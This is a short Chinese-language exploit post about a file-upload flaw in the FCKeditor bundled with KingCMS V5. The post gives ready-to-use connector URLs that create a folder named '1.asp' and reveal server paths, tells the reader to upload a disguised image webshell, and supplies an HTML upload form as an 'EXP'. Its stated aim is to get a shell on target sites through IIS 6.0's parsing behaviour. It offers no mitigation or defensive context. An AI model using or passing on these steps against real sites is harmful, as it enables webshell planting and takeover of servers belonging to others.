KINGCMS V5 IIS解析漏洞

发布日期：2010-11.26
发布作者：佚名

影响版本：未知
官方地址：http://www.kingcms.com/

漏洞类型：文件上传
漏洞描述：Kingcms  V5采用了Fckeditor编辑器，此版本Fckeditor存在建目录漏洞可远程构造建立1.asp并且上传伪造图片。IIS 6.0下实现解析漏洞拿目标站shell.

漏洞测试：

默认的

www.xx.com/admin/system/editor/FCKeditorboyisx/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/o.asp&NewFolderName=1.asp

强制建立文件夹与爆出路径

www.xx.com/admin/system/editor/FCKeditorboyisx/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

传jpg小马

另送EXP一个。 传asp;jpg格式 保存为htm即可：

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xx.com/admin/system/editor/FCKeditorboyisx/editor/filemanager/connectors/asp/upload.asp?Type=Image" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

上传后查看源代码即可获取文件名。

标签分类：